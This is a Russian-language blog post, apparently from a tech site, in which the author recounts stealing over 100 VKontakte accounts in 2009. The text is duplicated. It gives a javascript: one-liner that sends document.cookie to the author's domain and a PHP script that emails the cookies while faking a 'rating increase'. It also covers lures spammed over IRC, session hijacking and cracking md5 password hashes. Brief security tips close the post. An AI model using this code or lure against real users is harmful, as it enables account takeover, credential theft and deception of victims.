Всем привет. Многие из Вас, наверное, знакомы со способами взлома профилей вконтакте. Дальше опишу, как я в 2009 году украл доступы на более 100 профилей вконтакте за пару дней.
Коротко говоря, были реализованы такие действия:
1) Регистрация бесплатного хостинга;
2) Загрузка на хостинг простого PHP-скрипта, который получает GET-запрос и отправляет данные на мой e-mail;
3) Придумывание хитрого способа заставить пользователя ввести вредоносный код в адресную строку браузера;
4) Спам-рассылка.
Если кто-то помнит, то в 2009 году у пользователей сайта вконтакте был рейтинг, который можно было приобрести за голоса. Рейтинг влиял на выдачу в поиске людей, а также показывал популярность и крутость пользователя. Мне нужно было заставить пользователей вводить в адресную строку браузера следующий код (код отправляет куки на мой сервер):
Я принял решение мотивировать пользователей на это действие, якобы, увеличением рейтинга их профиля.
Дальше был написан и загружен на бесплатный хостинг такой код (index.php):
Этот код принимал куки и отправлял мне на e-mail.
Поскольку в 2009 году irc-сети еще пользовались достаточной популярностью, я принялся за спам-рассылку именно там. Как бы просто и глупо это не выглядело, но результаты не заставили себя долго ждать. Этот способ, кстати, конвертировал по 20-50 жертв в сутки.
Письма были следующего содержания:
Что же делать дальше с этими данными? Можно было заменить куки в браузере, тем самым перехватить сессию пользователя и получить доступ к его странице вконтакте.
Возьмем md5-hash remixpass со скриншота и найдем его. Благо, md5 словарей много.
Итого: у нас уже есть e-mail, пароль и украденная сессия жертвы.
Даже если Вы не станете вводить код в адресную строку, то это не гарантирует того, что Ваши куки не перехватят, например, внедрив XSS-атаку на сайт. (Про XSS можно почитать тут)
Советы по безопасности:
1. Всегда завершайте сеанс на сайте нажатием на кнопку «Выйти». Тем самым Вы убиваете сессию, что не дает возможности когда-либо воспользоваться украденными куками;
2. Не вводите в адресную строку браузера непонятный для Вас javascript код.
В заключение, хочу сказать, что примерно спустя полгода меня забанили на бесплатном хостинге. Также, что никто при этом не пострадал и все это было проделано в ознакомительных интересах.
Коротко говоря, были реализованы такие действия:
1) Регистрация бесплатного хостинга;
2) Загрузка на хостинг простого PHP-скрипта, который получает GET-запрос и отправляет данные на мой e-mail;
3) Придумывание хитрого способа заставить пользователя ввести вредоносный код в адресную строку браузера;
4) Спам-рассылка.
Процесс взлома
Если кто-то помнит, то в 2009 году у пользователей сайта вконтакте был рейтинг, который можно было приобрести за голоса. Рейтинг влиял на выдачу в поиске людей, а также показывал популярность и крутость пользователя. Мне нужно было заставить пользователей вводить в адресную строку браузера следующий код (код отправляет куки на мой сервер):
javascript:window.location.replace("http://мойдомен/?a="+document.cookie);
Я принял решение мотивировать пользователей на это действие, якобы, увеличением рейтинга их профиля.
Дальше был написан и загружен на бесплатный хостинг такой код (index.php):
...
<?php
if(isset($_GET['a']) { // проверяем GET-запрос на существование
mail('моя@почта', 'Украденный аккаунт vkontakte.ru', $_GET['a']); // бесплатный хостинг позволял использовать функцию mail() для отправки почты
echo '<script type="text/javascript">
alert("Спасибо за заявку! В течении суток Ваш рейтинг вконтакте увеличится! Сообщите об этом способе друзьям, пока не прикрыли."); // выводим сообщение о зачислении рейтинга
window.history.back(); // возвращаемся обратно на страницу вконтакте
</script>';
} else {
echo '<p>... Текст, убеждающий ввести javascript код в адресную строку браузера ...</p>';
}
...
Этот код принимал куки и отправлял мне на e-mail.
Поскольку в 2009 году irc-сети еще пользовались достаточной популярностью, я принялся за спам-рассылку именно там. Как бы просто и глупо это не выглядело, но результаты не заставили себя долго ждать. Этот способ, кстати, конвертировал по 20-50 жертв в сутки.
Письма были следующего содержания:
Что же делать дальше с этими данными? Можно было заменить куки в браузере, тем самым перехватить сессию пользователя и получить доступ к его странице вконтакте.
Возьмем md5-hash remixpass со скриншота и найдем его. Благо, md5 словарей много.
Итого: у нас уже есть e-mail, пароль и украденная сессия жертвы.
Заключение
Даже если Вы не станете вводить код в адресную строку, то это не гарантирует того, что Ваши куки не перехватят, например, внедрив XSS-атаку на сайт. (Про XSS можно почитать тут)
Советы по безопасности:
1. Всегда завершайте сеанс на сайте нажатием на кнопку «Выйти». Тем самым Вы убиваете сессию, что не дает возможности когда-либо воспользоваться украденными куками;
2. Не вводите в адресную строку браузера непонятный для Вас javascript код.
В заключение, хочу сказать, что примерно спустя полгода меня забанили на бесплатном хостинге. Также, что никто при этом не пострадал и все это было проделано в ознакомительных интересах.
Поделиться с друзьями
Комментарии (2)
Loki3000
12.12.2016 14:01+1Здравствуйте!
Я — Албанский вирус но, в связи с очень плохим развитием технологии в моей стране, к сожалению, я не могу причинить вред вашему компьютеру.
Пожалуйста будьте так любезны стереть один из важных файлов с вашего компьютера самостоятельно и перешлите меня другим, можно просто ссылку на меня.
Заранее благодарен за понимание и сотрудничество.
Как-то вот так…
KlimovDm